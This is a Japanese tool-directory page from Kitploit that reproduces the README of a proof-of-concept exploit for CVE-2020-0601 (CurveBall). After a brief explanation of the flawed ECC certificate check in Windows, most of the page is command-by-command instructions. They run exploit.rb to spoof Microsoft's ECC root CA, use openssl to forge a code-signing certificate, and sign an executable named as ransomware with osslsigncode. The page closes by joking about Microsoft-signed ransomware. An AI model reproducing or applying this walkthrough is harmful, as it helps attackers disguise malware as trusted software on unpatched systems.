Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CurveBall-CVE-2020-0601-PoC — CVE-2020-0601 (CurveBall)の概念実証エクスプロイト。ECC証明書検証のバイパスを実証し、信頼されたCAを偽装して任意の実行ファイルに署名する。 | Kitploit
ツール/GitHubGitHub/okanulkr/curveball-cve-2020-0601-poc
脆弱性分析コード分析エクスプロイト暗号化ペネトレーションテストレッドチーミング
GitHubokanulkr/curveball-cve-2020-0601-poc

CurveBall-CVE-2020-0601-PoC

CVE-2020-0601 (CurveBall)の概念実証エクスプロイト。ECC証明書検証のバイパスを実証し、信頼されたCAを偽装して任意の実行ファイルに署名する。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
5年前未レビュー

CurveBall (CVE-2020-0601) - PoC

CurveBallとして知られるこの脆弱性は、ECCアルゴリズムを使用する証明書の検証が無効であることに起因します。Windowsは、証明書キャッシュから以前に検証済みの証明書を検証しようとし、その際に証明書の公開鍵が同一かどうかのみをチェックし、他のパラメータをチェックしません。

数学的詳細

証明書を偽装するために、以下のようにパラメータを明示的に設定します:

root@kitploit:~
d' = 1 
G' = Q

詳細については、final_report_milestone_IV.pdfファイルの数学的詳細セクションを参照してください。

使用方法 (コード署名)

このPoCでは、"Microsoft ECC Product Root Certificate Authority"(Microsoftが2043年まで信頼する証明書)を使用します。

CAから公開鍵を抽出し、脆弱性に従って変更してみましょう。

root@kitploit:~
ruby exploit.rb ./MicrosoftECCProductRootCertificateAuthority.cer

この鍵に基づいて新しいx509証明書を生成します。これが、私たち自身の偽装CAになります。

root@kitploit:~
openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt -subj "/C=/ST=/L=/O=/OU=/CN=/emailAddress="

spoofed_ca.crtの内容を表示するには

root@kitploit:~
openssl x509 -in spoofed_ca.crt -noout -text

新しい鍵を生成します。この鍵は任意のタイプで構いません。コード署名証明書を作成するために使用され、その証明書を私たち自身のCAで署名します。

root@kitploit:~
openssl ecparam -name secp384r1 -genkey -noout -out cert.key

次に、新しい証明書署名要求(CSR)を作成します。この要求は通常、信頼できるCAに送信されますが、私たちは偽装したCAを持っているので、自分で署名することができます。

root@kitploit:~
openssl req -new -key cert.key -out cert.csr -config openssl_cs.conf -reqexts v3_cs

新しいCSRを偽装したCAとCA鍵で署名します。この証明書は2047年まで有効ですが、実際の信頼できるMicrosoft CAは2043年で失効します。

root@kitploit:~
openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_cs.conf -extensions v3_cs

残っているのは、証明書、その鍵、および偽装CAをPKCS12ファイルにパッケージ化して、実行ファイルに署名することだけです。

root@kitploit:~
openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name "Code Signing" -out cert.p12

PKCS12ファイルを使用して実行ファイルに署名しましょう。

root@kitploit:~
osslsigncode sign -pkcs12 cert.p12 -n "Signed by PISP Team" -in unsigned_ransomware.exe -out microsoft_signed_ransomware.exe -pass 1234

これで、Microsoftによって署名された真新しいランサムウェアが完成しました :)

ツールをダウンロード